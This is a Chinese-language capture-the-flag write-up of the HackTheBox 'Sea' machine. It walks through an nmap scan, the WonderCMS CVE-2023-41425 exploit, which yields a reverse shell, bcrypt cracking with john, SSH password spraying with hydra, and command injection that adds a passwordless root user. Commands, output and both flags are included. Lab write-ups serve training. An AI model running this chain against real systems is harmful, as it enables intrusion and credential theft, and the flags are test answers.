HTB：Sea[WriteUP]

目录

连接至HTB服务器并启动靶机

使用nmap对靶机TCP端口进行开放扫描

使用curl访问靶机80端口

使用ffuf对靶机进行了一顿FUZZ

尝试在Github上搜索版权拥有者

除了LICENSE还FUZZ出了version文件尝试访问

尝试直接在Github搜索该符合该版本的EXP

横向移动

使用john对该哈希值进行爆破

使用hydra对靶机系统进行SSH服务密码喷洒

USER_FLAG：fe382298cf2c1d24dff7ffe321071998

特权提升

直接使用amay用户的凭证即可登录

ROOT_FLAG：f0029f417785aefce36306dd8ee1951a

---

连接至HTB服务器并启动靶机

靶机IP：10.10.11.28

分配IP：10.10.16.7

---

使用nmap对靶机TCP端口进行开放扫描

nmap -p- -sS --min-rate=1500 -T5 -Pn 10.10.11.28 

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- -sS --min-rate=1500 -T5 -Pn 10.10.11.28               
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-13 22:19 EST
Warning: 10.10.11.28 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.28
Host is up (0.15s latency).
Not shown: 64119 closed tcp ports (reset), 1414 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 50.14 seconds

使用curl访问靶机80端口

curl -I http://10.10.11.28:80

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.11.28:80
HTTP/1.0 200 OK
Date: Thu, 14 Nov 2024 03:10:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=taj3r4rcaf7irnq5gfk3hks2o5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

使用ffuf对靶机进行了一顿FUZZ

访问LICENSE文件

curl http://10.10.11.28/themes/bike/LICENSE

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl http://10.10.11.28/themes/bike/LICENSE
MIT License

Copyright (c) 2019 turboblack

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

---

尝试在Github上搜索版权拥有者

查看Github上的LICENSE文件可以发现与我们FUZZ到的文件内容是一模一样的

基本可以确定靶机使用的WebAPP为：WonderCMS

除了LICENSE还FUZZ出了version文件尝试访问

curl http://10.10.11.28/themes/bike/version

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl http://10.10.11.28/themes/bike/version
3.2.0

---

尝试直接在Github搜索该符合该版本的EXP

可以看到爆了漏洞编号：CVE-2023-41425

我这里使用的EXP链接：https://github.com/duck-sec/CVE-2023-41425(如果你找到的EXP不起作用可以试试这个)

git clone https://github.com/duck-sec/CVE-2023-41425.git

配置好参数

python exploit.py -u http://sea.htb/loginURL -lh 10.10.16.7 -lp 1425 -sh 10.10.16.7 -sp 8888

将下面的链接通过/contact页面发送至管理员处，不多时便能收到访问请求

本地侧nc提前开启监听，此刻也可收到回显

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvp 1425
listening on [any] 1425 ...
10.10.11.28: inverse host lookup failed: Unknown host
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.28] 38378
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 11:03:14 up 30 min,  0 users,  load average: 0.69, 0.67, 0.38
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

---

横向移动

通过命令可知系统内安装有python3

$ python3 -V
Python 3.8.10

提升TTY

python3 -c 'import pty;pty.spawn("/bin/bash")'

在一翻搜索后，在/var/www/sea/data目录下找到database.js文件

www-data@sea:/var/www/sea/data$ pwd
pwd
/var/www/sea/data
www-data@sea:/var/www/sea/data$ ls
ls
cache.json  database.js  files

使用cat命令查看其内容里面有一串哈希密码

grep -C 5 'password' database.js

$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q

将该哈希值去除反斜杠后存入hash文件中

echo '$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q' | tr -d '\\' > hash

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo '$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q' | tr -d '\\' > hash
                                                                                                                                                    
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat hash
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q

使用john对该哈希值进行爆破

john hash --wordlist=../dictionary/rockyou.txt

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# john hash --wordlist=../dictionary/rockyou.txt                     
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mychemicalromance (?)     
1g 0:00:00:29 DONE (2024-11-14 06:32) 0.03343g/s 102.9p/s 102.9c/s 102.9C/s iamcool..milena
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

拿到了明文密码：mychemicalromance

由于不知道该密码对哪个用户有效，所以我们查看一下系统内支持登录的用户

cat /etc/passwd

支持终端交互的用户有：root、amay、geo

将三个用户名写入users.txt文件中

echo 'root\namay\ngeo' > users.txt

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo 'root\namay\ngeo' > users.txt                                                       
                                                                                                                                                    
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat users.txt
root
amay
geo

使用hydra对靶机系统进行SSH服务密码喷洒

hydra -L users.txt -p 'mychemicalromance' ssh://10.10.11.28

账户：amay

密码：mychemicalromance

使用该凭证通过SSH服务登录到靶机

ssh amay@10.10.11.28

登陆后在当前目录下就能找到user.txt

amay@sea:~$ ls
user.txt
amay@sea:~$ cat user.txt
fe382298cf2c1d24dff7ffe321071998

USER_FLAG：fe382298cf2c1d24dff7ffe321071998

---

特权提升

查看靶机网络连接

ss -tlnp

可见靶机内部是开放了8080端口，我尝试通过SSH服务将其转发到本地

ssh -L 8080:localhost:8080 amay@10.10.11.28

端口转发后使用浏览器直接访问，上来就提示需要认证

直接使用amay用户的凭证即可登录

经过一系列测试发现，Analyze Log File此处存在任意文件读取

使用BurpSuite进行抓包重放

接着尝试RCE发现居然也可以

我尝试直接往靶机/etc/passwd文件中加入无密码管理员用户

记得将Payloadd进行URL编码

直接扔到重放器里发包

在靶机中再次查看/etc/passwd文件

cat /etc/passwd

查找root_flag位置并查看其内容

root@sea:/home/amay# find / -name 'root.txt'
/root/root.txt
root@sea:/home/amay# cat /root/root.txt
f0029f417785aefce36306dd8ee1951a

ROOT_FLAG：f0029f417785aefce36306dd8ee1951a